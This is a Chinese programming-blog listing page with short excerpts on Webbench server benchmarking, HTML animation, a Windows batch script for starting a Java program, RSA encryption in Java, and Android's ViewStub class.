Webbench能测试处在相同硬件上,不同服务的性能以及不同硬件上同一个服务的运行状况。webbench的标准测试可以向我们展示服务器的两项内容:每秒钟相
    
                                
    • 
                                
  • 第11章 动画效果(中)
                                    onestopweb
动画
                                    
    index.html 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
    
                                
    • 
                                
  • windows下制作bat启动脚本.
                                    sanyecao2314
javacmd脚本bat
                                    
    java -classpath C:\dwjj\commons-dbcp.jar;C:\dwjj\commons-pool.jar;C:\dwjj\log4j-1.2.16.jar;C:\dwjj\poi-3.9-20121203.jar;C:\dwjj\sqljdbc4.jar;C:\dwjj\voucherimp.jar com.citsamex.core.startup.MainStart 
    
                                
    • 
                                
  • Java进行RSA加解密的例子
                                    tomcat_oracle
java
                                    
    加密是保证数据安全的手段之一。加密是将纯文本数据转换为难以理解的密文;解密是将密文转换回纯文本。     数据的加解密属于密码学的范畴。通常,加密和解密都需要使用一些秘密信息,这些秘密信息叫做密钥,将纯文本转为密文或者转回的时候都要用到这些密钥。     对称加密指的是发送者和接收者共用同一个密钥的加解密方法。     非对称加密(又称公钥加密)指的是需要一个私有密钥一个公开密钥,两个不同的密钥的
    
                                
    • 
                                
  • Android_ViewStub
                                    阿尔萨斯
ViewStub
                                    
    public final class ViewStub extends View 
 
 
 java.lang.Object 
   
   android.view.View 
     
     android.view.ViewStub 
      
    
 
 类摘要: ViewStub 是一个隐藏的,不占用内存空间的视图对象,它可以在运行时延迟加载布局资源文件。当 ViewSt
    
                                
    • 
                

            

        

    




    

        

            按字母分类:
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他